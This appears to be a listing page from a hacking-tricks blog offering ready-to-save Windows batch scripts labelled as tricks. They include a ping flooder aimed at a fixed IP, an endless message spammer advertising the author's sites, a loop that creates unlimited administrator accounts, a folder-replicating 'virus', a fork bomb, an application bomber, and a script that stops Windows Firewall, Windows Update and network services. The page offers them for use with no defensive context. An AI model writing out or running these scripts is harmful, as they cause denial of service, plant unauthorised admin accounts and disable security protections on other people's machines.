Showing posts with label Batch File tricks. Show all posts
Showing posts with label Batch File tricks. Show all posts

Packet flooder

Open Notepad & Type

@echo off
:flood
ping -l 65500 -t 10.179.65.68
start flooder.bat
goto flood
Save as raj.bat

Msg Annoyer (Message Broadcaster)

Open Notepad & Type
@echo off
:netannoy
msg * Hi!
msg * How r u ?
msg * Wat's Up ?
msg * Myself Raj Chandel....
msg * My Web Links are....
msg * www.rajhackingarticles.blogspot.com.....
msg * www.upscportal.in
msg * www.usefulwebsitename.blogspot.com
goto netannoy
Save as raj.bat

Create Unlimted User

open notepad & type
@echo off
:usrflood
set usr=%random%
net users %usr% %random% /add
net localgroup administrators %usr% /add
goto usrflood
Save as raj.bat

Folder Replicator Virus

open notepad & type
:loop
md Virus
cd Virus
goto loop
save as raj.bat

Fork Bombing

open notepad & type
@echo off
:loop
Explorer
Call fork.bat
Goto loop
save as hackingarticles.bat

How To Change All Files Extension

You can change the extension for all files in a folder automatically using the command prompt too


Application Bomber

open notepad & type
@echo off
:loop
start notepad
start compmgmt.msc
start mspaint
start osk
start cmd
start explorer
start control
start calc
goto loop
save as raj.bat

Service Disabler

open notepad & type
@echo off
net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes
exit
save as raj.bat